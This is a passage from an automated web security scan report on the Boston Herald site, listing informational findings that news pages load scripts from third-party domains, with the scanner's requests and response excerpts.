http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:34:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.104. http://bostonherald.com/news/national/southwest/view/20101107oklahoma_council_takes_no_stand_on_sharia_law_proposal/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/national/southwest/view/20101107oklahoma_council_takes_no_stand_on_sharia_law_proposal/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/national/southwest/view/20101107oklahoma_council_takes_no_stand_on_sharia_law_proposal/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:35:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.105. http://bostonherald.com/news/obituaries/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/obituaries/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /news/obituaries/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:52:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 48427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.106. http://bostonherald.com/news/offbeat/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/offbeat/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://img.video.ap.org/p/j/apovn.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /news/offbeat/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:47:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 52589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div class="gutter_teaseInner" style="padding:0 0 0 4px">

<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js "></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.107. http://bostonherald.com/news/offbeat/view/20101103man_in_breathalyzer_costume_cited_for_dui/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/offbeat/view/20101103man_in_breathalyzer_costume_cited_for_dui/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/offbeat/view/20101103man_in_breathalyzer_costume_cited_for_dui/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:51:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.108. http://bostonherald.com/news/offbeat/view/20101106costly_collecting_habit_nuns_score_with_262g_baseball_card/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/offbeat/view/20101106costly_collecting_habit_nuns_score_with_262g_baseball_card/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/offbeat/view/20101106costly_collecting_habit_nuns_score_with_262g_baseball_card/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:49:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.109. http://bostonherald.com/news/offbeat/view/20101106stripper_pole_among_items_stolen_from_adult_bookstore/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/offbeat/view/20101106stripper_pole_among_items_stolen_from_adult_bookstore/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/offbeat/view/20101106stripper_pole_among_items_stolen_from_adult_bookstore/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:49:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.110. http://bostonherald.com/news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/format=comments&srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/format=comments&srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:48:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 55005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.111. http://bostonherald.com/news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
